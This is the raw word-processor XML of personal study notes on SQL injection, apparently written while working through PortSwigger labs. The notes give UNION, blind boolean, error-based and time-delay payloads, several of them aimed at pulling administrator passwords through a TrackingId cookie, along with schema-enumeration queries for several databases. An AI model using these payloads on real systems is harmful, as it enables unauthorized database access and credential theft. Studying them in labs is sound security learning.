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jc w:val="center"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Simple sql injection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 (NO spcaces use `+` instead between string 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========================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Submitting the single quote character ' and looking for errors or other anomalies.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Check if injection is possible ‘+AND+’1’=’1’--+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For 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  <w:t>mysql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 # is the way to comment out or – with extra space `--+` + for space encoding in URL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 xml:space="preserve">cheat sheet: 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highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>https://portswigger.net/web-security/sql-injection/cheat-sheet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UPDATE statements, within the updated values or the WHERE clause.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INSERT statements, within the inserted values.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SELECT statements, within the table or column name.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`'`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`'--`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`' UNION SELECT username, password FROM users--`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>For a UNION query to work, two key requirements must be met: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>The individual queries must return the same number of columns.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`' ORDER BY 1--` and increase the # on by one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`' UNION SELECT NULL--` and then increase the no of null one by one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ab/>
        <w:t>in url it would be like `' UNION + Select + NULL, NULL --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>The data types in each column must be compatible between the individual queries.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`' UNION SELECT 'a',NULL,NULL,NULL--` and shift the datatype one by one like `' UNION SELECT NULL,'a',NULL,NULL--`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ab/>
        <w:tab/>
        <w:tab/>
        <w:t>on oracle we could concatenate the columns `' UNION SELECT username || '~' || password FROM users--`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In SELECT statements, within the ORDER BY clause.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highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">For oracle the select NULL does not work unless from is not specified so use dual table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif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There is a built-in table on Oracle called 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dual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="5C5C5B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif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which you can use for this purpose. For example: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="5C5C5B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>UNION SELECT 'abc' FROM dual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 w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans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</w:pPr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>Blind sql injection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======================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Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic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differences in the resulting application responses.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 xml:space="preserve">Checking blind injection if response has some changes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caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t>…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2"/>
        </w:rPr>
        <w:t>xyz' AND '1'='1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Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for differences in the application's responses.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`' AND (select SUBSTR(password,21,1) from users limit 1)='§a§`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`xyz' AND 'b'='a`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`xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a`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`xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) &gt; 'm') THEN 1/0 ELSE 'a' END FROM Users)='a`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https://portswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-by-triggering-conditional-errors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`CAST((SELECT example_column FROM example_table) AS int)`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Submitting payloads designed to trigger time delays when executed within a SQL query, and looking for differences in the time taken to respond.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`</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__149_2726751381"/>
      <w:bookmarkStart w:id="1" w:name="__DdeLink__147_2726751381"/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'; IF (1=2) WAITFOR DELAY '0:0:10'--</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/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ab/>
        <w:t>e.g. '; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) &gt; 'm') = 1 WAITFOR DELAY '0:0:{delay}'--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Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and monitoring for any resulting interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2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 w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans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</w:pPr>
      <w:bookmarkStart w:id="2" w:name="error-based-sql-injection"/>
      <w:bookmarkEnd w:id="2"/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>Error-based SQL injection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b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="3" w:name="__DdeLink__152_2726751381"/>
      <w:r>
        <w:rPr>
          <w:rFonts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  <w:t>' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:br/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22"/>
        </w:rPr>
        <w:t>' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a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This generally work but depends on type of database like oracle, postgress or mysql so chose the payload from cheatsheet for bind error sql injection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Limit does not work here in the sql injection of the above command where error checking is happening like the following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eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAns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</w:pP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'</w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="__DdeLink__156_2726751381"/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||</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="__DdeLink__163_2726751381"/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 xml:space="preserve">(SELECT </w:t>
      </w:r>
      <w:bookmarkStart w:id="6" w:name="__DdeLink__160_2726751381"/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 xml:space="preserve">CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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FROM users  WHERE username='administrator')</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/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||</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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'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eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAns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</w:pP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SUBSTR(string, index,length) for Oracle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eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAns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</w:pP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</w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="494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3401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SUBSTR('foobar', 4, 2)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SUBSTRING('foobar', 4, 2)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bookmarkStart w:id="7" w:name="__DdeLink__165_2726751381"/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SUBSTRING</w:t>
            </w:r>
            <w:bookmarkEnd w:id="7"/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('foobar', 4, 2)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SUBSTRING('foobar', 4, 2)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Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:cstheme="minorBidi"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="extracting-sensitive-data-via-verbose-sq"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Extracting sensitive data via verbose SQL error messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Also adding a single quote also gives error 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>The  command will always give error and check for verbose messages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier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u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts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u w:val="none"/>
        </w:rPr>
        <w:tab/>
        <w:t>CAST((SELECT example_column FROM example_table) AS int)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ab/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>Sometimes there is a character limit so removing trackingid or some other fields can be great. Ex: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  <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w: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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Cookie: TrackingId='AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:eastAsia="Calibri" w:cs=""/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif" w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans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</w:pPr>
      <w:bookmarkStart w:id="9" w:name="exploiting-blind-sql-injection-by-trigge"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="DejaVu Sans" w:cs="DejaVu Sans" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-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highlight w:val="darkYellow"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Exploiting blind SQL injection by triggering time delays</w:t>
      </w:r>
    </w:p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pP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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="" w:cstheme="minorBidi" w:eastAsia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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>For time delays</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="625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4706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dbms_pipe.receive_message(('a'),10)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WAITFOR DELAY '0:0:10'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pg_sleep(10)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470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SLEEP(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:eastAsia="Calibri" w:cs=""/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US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en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2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 w:eastAsia="Times New Roman" w:cs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</w:pPr>
      <w:bookmarkStart w:id="10" w:name="conditional-time-delays"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial" w:ascii="Arial;Courier;sans-serif" w:hAnsi="Arial;Courier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  <w:t>Conditional time delays</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:widowControl/>
        <w:spacing w:lineRule="atLeast" w:line="360" w:before="96" w:after="96"/>
        <w:ind w:left="0" w:right="0" w:hanging="0"/>
        <w:jc w:val="left"/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  <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You can test a single boolean condition and trigger a time delay if the condition is true.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="902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7479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7479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CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual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7479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IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'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7479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CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END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7479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IF(YOUR-CONDITION-HERE,SLEEP(10),'a')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  <w:t>Always use + at the end of comment as shown below and also check that select is not being used everywhere as in where clause it can be directly used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Cookie: TrackingId=LNPMeEF8by4VWnNk'|| pg_sleep(10)--+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText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(SELECT CASE WHEN 1=1 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           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts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THEN pg_sleep(10)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           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts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ELSE pg_sleep(0) END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rFonts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   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBid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Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial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highlight w:val="yellow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en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the site </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Times New Roman" w:cs="Arial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6"/>
            <w:szCs w:val="26"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
          </w:rPr>
          <w:t>https://meyerweb.com/eric/tools/dencoder/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/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en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to encode/decode the ; present in cookies or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highlight w:val="yellow"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> CTRL+U to encode or decode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Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:highlight w:val="yellow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C9211E"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect why one works and other does not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</w:t>
      </w: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TrackingId=vGRXjPS6nJis2yqY' </w:t>
      </w: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red"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>||</w:t>
      </w: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SELECT CASE WHEN (SUBSTRING(password,1,1)='§20§') THEN pg_sleep(50) ELSE  pg_sleep(0)  END FROM users  WHERE username='administrator'--;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 xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="__DdeLink__167_2726751381"/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TrackingId=vGRXjPS6nJis2yqY'</w:t>
      </w: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darkYellow"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> %3B </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:cstheme="minorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace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IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>SELECT CASE WHEN (SUBSTRING(password,1,1)='§20§') THEN pg_sleep(50) ELSE  pg_sleep(0)  END FROM users  WHERE username='administrator'--;</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/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hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mon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2"/>
            <w:szCs w:val="22"/>
            <w:highlight w:val="darkYellow"/>
            <w:lang w:val="en-IN" w:eastAsia="en-US" w:bidi="ar-SA"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval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Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US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Style w:val="SourceText"/>
          <w:rFonts w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US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IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>https://portswigger.net/web-security/sql-injecti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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>on/cheat-sheet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TextBody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;Courier;sans-serif" w:hAnsi="Arial;Courier;sans-serif"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22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spacing w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>You can list the tables that exist in the database, and the columns that those tables contain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="902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7478"/>
      </w:tblGrid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Oracle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all_tables</w:t>
              <w:br/>
              <w:t>SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'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Microsoft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information_schema.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
                <w:b w:val="false"/>
                <w:sz w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>tables</w:t>
            </w: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br/>
              <w:t>SELECT * FROM information_schema.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:rFonts w:cs="" w:ascii="Courier;monospace" w:hAnsi="Courier;monospace" w:cstheme="minorBidi"/>
                <w:b w:val="false"/>
                <w:sz w:val="22"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
              <w:t>columns</w:t>
            </w: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 xml:space="preserve"> WHERE table_name = 'TABLE-NAME-HERE'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PostgreSQL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information_schema.tables</w:t>
              <w:br/>
              <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7478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SELECT * FROM information_schema.tables</w:t>
              <w:br/>
              <w:t>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody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  <w:b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Blind injection question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https://portswigger.net/web-security/sql-injection/blind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burpsuit pro: https://www.minuteinbox.com/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shamari.rhylan@madeforthat.org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Courier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altName w:val="Courier"/>
    <w:charset w:val="01"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default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yerweb.com/eric/tools/dencoder/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval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LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>7</Pages>
  <Words>859</Words>
  <Characters>5385</Characters>
  <CharactersWithSpaces>6245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2023-07-30T14:50:37Z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